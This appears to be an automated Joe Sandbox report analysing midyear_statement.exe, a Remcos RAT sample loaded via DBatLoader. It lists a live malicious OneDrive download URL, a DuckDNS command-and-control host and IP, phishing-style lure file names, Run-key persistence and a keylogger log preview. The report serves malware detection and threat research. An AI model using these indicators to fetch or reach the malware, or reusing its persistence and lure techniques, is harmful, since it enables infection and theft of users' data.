                                                                                                                  		high
                                                                                                                  https://abpoxw.sn.files.1drv.com/midyear_statement.exe, 00000000.00000003.1292113599.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1362063312.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.pmail.commidyear_statement.exe, midyear_statement.exe, 00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1381770717.0000000016137000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1382468437.0000000016170000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1380482770.0000000015C00000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, wkrriuhD.pif, 00000018.00000000.1358434050.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001B.00000000.1383271733.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001C.00000000.1383573996.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001D.00000000.1384411850.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001F.00000002.1566764474.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 00000021.00000000.1636440948.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif.0.drfalse
                                                                                                                      		high
                                                                                                                      http://ocsp.sectigo.com0Cmidyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.ebuddy.comwkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown

                                                                                                                      World Map of Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public IPs

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      13.107.139.11
                                                                                                                      		dual-spov-0006.spov-msedge.netUnited States
                                                                                                                      		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                      192.3.109.132
                                                                                                                      		www.zuckdgreb.duckdns.orgUnited States
                                                                                                                      		36352AS-COLOCROSSINGUStrue
                                                                                                                      178.237.33.50
                                                                                                                      		geoplugin.netNetherlands
                                                                                                                      		8455ATOM86-ASATOM86NLfalse

                                                                                                                      General Information

                                                                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                      Analysis ID:1417015
                                                                                                                      Start date and time:2024-03-28 13:58:07 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 10m 59s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:38
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:midyear_statement.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.rans.phis.troj.spyw.expl.evad.winEXE@39/16@7/3
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 99%
                                                                                                                      • Number of executed functions: 98
                                                                                                                      • Number of non-executed functions: 207
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                      Warnings

                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 13.107.42.12
                                                                                                                      • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-sn-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, odc-sn-files-geo.onedrive.akadns.net, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      13:58:57API Interceptor1x Sleep call for process: midyear_statement.exe modified
                                                                                                                      13:59:10API Interceptor24x Sleep call for process: powershell.exe modified
                                                                                                                      13:59:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Dhuirrkw C:\Users\Public\Dhuirrkw.url
                                                                                                                      15:41:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Dhuirrkw C:\Users\Public\Dhuirrkw.url
                                                                                                                      15:41:08API Interceptor2x Sleep call for process: Dhuirrkw.PIF modified
                                                                                                                      15:41:28API Interceptor6120056x Sleep call for process: wkrriuhD.pif modified

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      13.107.139.11ENQUNION096424 CLOSING DATE URGENT.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                        https://1drv.ms/o/s!Aks-7t91vov6sE-66HewIX77qIuB?e=wdAigZGet hashmaliciousSharepointPhisherBrowse
                                                                                                                          Statement Of Account - Overdue Payments #94839540823489.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                            SecuriteInfo.com.Win32.Evo-gen.7105.24636.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                              PRODUCTS.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                SecuriteInfo.com.Variant.MSILHeracles.154798.18921.25285.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  Zam#U00f3wienie_5210000045542300.cmdGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                                                    RFQ#30091.CMD.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                                      Returned Swift Copy of Payment #475479.batGet hashmaliciousDBatLoaderBrowse
                                                                                                                                        Returned Swift Copy of Payment #475479.batGet hashmaliciousDBatLoaderBrowse
                                                                                                                                          192.3.109.132repeatorder.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                            product_order.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                              conditional_order.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                178.237.33.50awb_shipping_documents_27_03_2024_0000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                FEDEX-TNT-OVERDUE-UNPAID-INVOICE980055177854.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                DHL TAX INVOICES - MARCH 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                Statement of Account for Past Due Invoices.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                z1awb_shipping_documents_27_03_2024_000000000.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                ENQUNION096424 CLOSING DATE URGENT.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                3rd Shipment schedule & packing list of NORDLEOPARD V.413S.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                PI-BD2403001.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                awb_shipping_documents_26_03_2024_000000000.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                Order P.O26_3_24.CommonWealth.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp

                                                                                                                                                Domains

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                www.zuckdgreb.duckdns.orgrepeatorder.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                • 192.3.109.132
                                                                                                                                                dual-spov-0006.spov-msedge.net101206 - 24595 - Nymc - 401K - Audit - Change Report 9(Rev) + 10 + 11 + 12-882755.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                • 13.107.137.11
                                                                                                                                                Inquiry_GMD_Specifications_7266738879_G#2024.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                • 13.107.137.11
                                                                                                                                                ENQUNION096424 CLOSING DATE URGENT.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                • 13.107.139.11
                                                                                                                                                https://1drv.ms/o/s!BFRjM-vQxGYFhElDOX-pd0RkvatP?e=Rp2e0wqCfEOklCep72qfVw&at=9&d=DwMFAwGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                • 13.107.137.11
                                                                                                                                                https://1drv.ms/o/s!Aks-7t91vov6sE-66HewIX77qIuB?e=wdAigZGet hashmaliciousSharepointPhisherBrowse
                                                                                                                                                • 13.107.139.11
                                                                                                                                                Yeni sifaris siyahisi.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                • 13.107.137.11
                                                                                                                                                https://1drv.ms/o/s!Aks-7t91vov6sCpKk2puy8xtGsHV?e=AsvnyKGet hashmaliciousSharepointPhisherBrowse
                                                                                                                                                • 13.107.137.11
                                                                                                                                                Order inquiry.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                • 13.107.137.11
                                                                                                                                                https://sharepoint-8sw.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 13.107.137.11
                                                                                                                                                Statement Of Account - Overdue Payments #94839540823489.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                • 13.107.139.11
                                                                                                                                                geoplugin.netawb_shipping_documents_27_03_2024_0000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                FEDEX-TNT-OVERDUE-UNPAID-INVOICE980055177854.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                DHL TAX INVOICES - MARCH 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                Statement of Account for Past Due Invoices.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                z1awb_shipping_documents_27_03_2024_000000000.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                ENQUNION096424 CLOSING DATE URGENT.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                3rd Shipment schedule & packing list of NORDLEOPARD V.413S.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                PI-BD2403001.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                awb_shipping_documents_26_03_2024_000000000.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                Order P.O26_3_24.CommonWealth.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • 178.237.33.50

                                                                                                                                                ASNs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                AS-COLOCROSSINGUSStatement of Account for Past Due Invoices.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • 192.210.201.57
                                                                                                                                                RFQ No. 5490490.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                • 107.175.113.216
                                                                                                                                                ENQUNION096424 CLOSING DATE URGENT.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                • 192.3.216.131
                                                                                                                                                https://62.172-245-112-195.cprapid.com/PayPaI/IP:Get hashmaliciousUnknownBrowse
                                                                                                                                                • 172.245.112.195
                                                                                                                                                PO_OCF 408.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                • 198.46.173.145
                                                                                                                                                PI-BD2403001.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                • 23.95.235.29
                                                                                                                                                36KV XLPE Materials-300mm.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                • 192.210.215.35
                                                                                                                                                1.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                • 107.175.113.216
                                                                                                                                                MICROSOFT_OFFICE_EXCEL_A.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                • 205.234.157.226
                                                                                                                                                po3495954.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                • 198.46.173.145
                                                                                                                                                ATOM86-ASATOM86NLawb_shipping_documents_27_03_2024_0000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                FEDEX-TNT-OVERDUE-UNPAID-INVOICE980055177854.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                DHL TAX INVOICES - MARCH 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                Statement of Account for Past Due Invoices.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                z1awb_shipping_documents_27_03_2024_000000000.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                ENQUNION096424 CLOSING DATE URGENT.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                3rd Shipment schedule & packing list of NORDLEOPARD V.413S.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                PI-BD2403001.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                awb_shipping_documents_26_03_2024_000000000.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                Order P.O26_3_24.CommonWealth.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • 178.237.33.50
                                                                                                                                                MICROSOFT-CORP-MSN-AS-BLOCKUShttps://colourlyrics.com/fe/KtHc5ruvtRkZFoArrtthaJsvCmg3Rb7X4JToP666Ry87hz3e3rFuRJGAPKBcoBZjAZJZK4pouqXoieozb8x97ijrpxmdxNfsxaBCR2nGFdZnrhtCVLagarbeJ5bjm2rcgeCmZPnkCo2NqoSFB3o6MQGet hashmaliciousUnknownBrowse
                                                                                                                                                • 13.107.246.51
                                                                                                                                                FindAll.xlaGet hashmaliciousUnknownBrowse
                                                                                                                                                • 13.107.246.40
                                                                                                                                                http://avsvmcloud.comGet hashmaliciousUnknownBrowse
                                                                                                                                                • 20.140.0.1
                                                                                                                                                11111.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                • 13.107.246.40
                                                                                                                                                AhbJkpk3Z8.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                • 20.167.146.117
                                                                                                                                                dysrvPhMb0.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 20.48.73.233
                                                                                                                                                66yaYNheLa.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                • 13.80.73.249
                                                                                                                                                XCSBsTmkde.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 20.124.86.140
                                                                                                                                                CGlwOBF2cH.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.40.77.22
                                                                                                                                                lYMzLERz9v.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                • 191.237.178.54

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1QJwM0vJ5mk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 13.107.139.11
                                                                                                                                                mUY60MPRcJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 13.107.139.11
                                                                                                                                                FindAll.xlaGet hashmaliciousUnknownBrowse
                                                                                                                                                • 13.107.139.11
                                                                                                                                                11111.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                • 13.107.139.11
                                                                                                                                                0u4INeEGGS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 13.107.139.11
                                                                                                                                                i1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                • 13.107.139.11
                                                                                                                                                7gA40t6M1y.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 13.107.139.11
                                                                                                                                                aMObJ2eTUf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                • 13.107.139.11
                                                                                                                                                https://d2b0yahslb04qh.cloudfront.net/W0in0sNw0S0sh01Er038/index.html?ph0ne=+1-833-317-3190Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                • 13.107.139.11
                                                                                                                                                https://d24s8bqqqoxjsw.cloudfront.net/Wi0n088StJnyEr087/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                • 13.107.139.11

                                                                                                                                                Dropped Files

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                C:\Users\Public\Libraries\wkrriuhD.pifaMObJ2eTUf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                  Inquiry_GMD_Specifications_7266738879_G#2024.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                    SecuriteInfo.com.Win32.Evo-gen.9756.30202.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                      SecuriteInfo.com.Win32.Evo-gen.7105.24636.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                        Material Purchase Order for the Supply.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                          product_order.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                            ungziped_file.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                              DHL SHIPPING DOCUMENT - BL - AWB PACKING LIST_02292024.exeGet hashmaliciousDBatLoader, PureLog Stealer, zgRATBrowse
                                                                                                                                                                DHL SHIPPING DOCUMENT - BL - AWB PACKING LIST_02292024.exeGet hashmaliciousDBatLoader, RedLineBrowse
                                                                                                                                                                  DHL_AWB#6078538091.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                                    C:\Windows \System32\2506803.exeaMObJ2eTUf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                      Inquiry_GMD_Specifications_7266738879_G#2024.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                                        ENQUNION096424 CLOSING DATE URGENT.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                          PI-BD2403001.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                            Order inquiry.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                              Statement Of Account - Overdue Payments #94839540823489.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                                Document.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                                  BBRAUN VIETNAM - RFQ-QT240422703-01 - 3-29-2024-20-00.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                    SecuriteInfo.com.Win32.Evo-gen.9756.30202.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                                      SecuriteInfo.com.Win32.Evo-gen.7105.24636.exeGet hashmaliciousRemcos, DBatLoaderBrowse

                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                        C:\ProgramData\remcos\logs.dat

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):288
                                                                                                                                                                                        Entropy (8bit):3.3403739461321296
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:rhlKlrl9Nrx5JWRal2Jl+7R0DAlBG45klovDl6ALilXIkqoojklovDl6ALilXIk/:6lz5YcIeeDAlOWAAe5q1gWAAe5q1gWAv
                                                                                                                                                                                        MD5:53F39060C128C092FE1DEDCE56FD722D
                                                                                                                                                                                        SHA1:211DA2844034599DFD2D5DEEE5289A6ACDCE90A8
                                                                                                                                                                                        SHA-256:2EBF058C161E48889668A5AD8552D488EA9CAA3441E09EBFD23930960806FAD6
                                                                                                                                                                                        SHA-512:4DE7FCCCE0A21319FD7010AAF0C7C4C2A0BAB454B1FD4A85967887EBCA3B55C8E95315B2126CACA9EA47579B7B935434C92FC7C82B1BD6A0064754C7852448A6
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                                                        Preview:....[.2.0.2.4./.0.3./.2.8. .1.3.:.5.9.:.1.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                                                                                                        C:\Users\Public\Dhuirrkw.url

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\midyear_statement.exe
                                                                                                                                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Dhuirrkw.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):100
                                                                                                                                                                                        Entropy (8bit):5.060889316089751
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMYWe41CHovsb9OvfAKov:HRYFVmTWDyzcLEyE9OQKy
                                                                                                                                                                                        MD5:98CEDD728217C8E88B50667980974A9F
                                                                                                                                                                                        SHA1:D99A98F1722AEDCB9EE60D08C38CFADE3CB22A3F
                                                                                                                                                                                        SHA-256:5F0DF8D30DF5428164AAABADCD1D8B873186C6E0D5247B157196C32696F28F77
                                                                                                                                                                                        SHA-512:EB629799815FA585816309776484ECEDB462EDC1FD7A17D969588ABA80626F107B41CFFC7972C227C53604E08F077A84E427CD2D11B5CEB45A1E2B150D982013
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Dhuirrkw.PIF"..IconIndex=54..HotKey=21..

                                                                                                                                                                                        C:\Users\Public\Libraries\Dhuirrkw.PIF

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1265664
                                                                                                                                                                                        Entropy (8bit):7.0065077195606165
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:12288:evGkW/sci4Vup7XNihvMHH59TpfLFhLme7iEEEblTHQE1ZEQrfvAcEH+DwxTe8g:e+Rg+up7XNiyHZ994eHQEQahz
                                                                                                                                                                                        MD5:DD8E3F6AC5C24960B3A69490082C60E1
                                                                                                                                                                                        SHA1:C5F8AAEC5BAA571791789DD5FAC53E27938DBC29
                                                                                                                                                                                        SHA-256:15DB18392D7BBF15B30E528DB05EC306E00AC3227277D0639064EC3E2BC98C73
                                                                                                                                                                                        SHA-512:AC96E6FB368F5E2C8B8A80EB32635357F1931838B8575125956FE2E3C2465B7BD228606635F3563BB0A047B3BC8FBD19D25E0609210C4574C05993EC078AD205
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................R......L........ ....@..............................................@...........................P..N%...............................m...................................................V...............................text............................... ..`.itext.............................. ..`.data...|.... ......................@....bss....p6...............................idata..N%...P...&..................@....tls....4................................rdata..............................@..@.reloc...m.......n..................@..B.rsrc................z..............@..@.....................P..............@..@................................................................................................

                                                                                                                                                                                        C:\Users\Public\Libraries\Null

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\midyear_statement.exe
                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):4
                                                                                                                                                                                        Entropy (8bit):2.0
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Vy:s
                                                                                                                                                                                        MD5:E655C6429C1DFBA3509EEA2FC2108EFF
                                                                                                                                                                                        SHA1:6D8A1F6E74D27B3EB0E07AD8AF02F9DF002462FA
                                                                                                                                                                                        SHA-256:A77B54178E2066FDC29229D4C0B59051CAEDC92E918E037928E185D39AD86316
                                                                                                                                                                                        SHA-512:E31042C3AA2A0FF85FD261F04F63FA33EA0C5A348D9D8A23FA8092ED9ABCFD881E130D25284143ADE9E80CFEAE95988B92EC79F2A75EFC1A61B548CBEA0CB1C7
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:37..

                                                                                                                                                                                        C:\Users\Public\Libraries\wkrriuhD.pif

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\midyear_statement.exe
                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:modified
                                                                                                                                                                                        Size (bytes):68096
                                                                                                                                                                                        Entropy (8bit):6.328046551801531
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                                                                                                        MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                        SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                                                                                                        SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
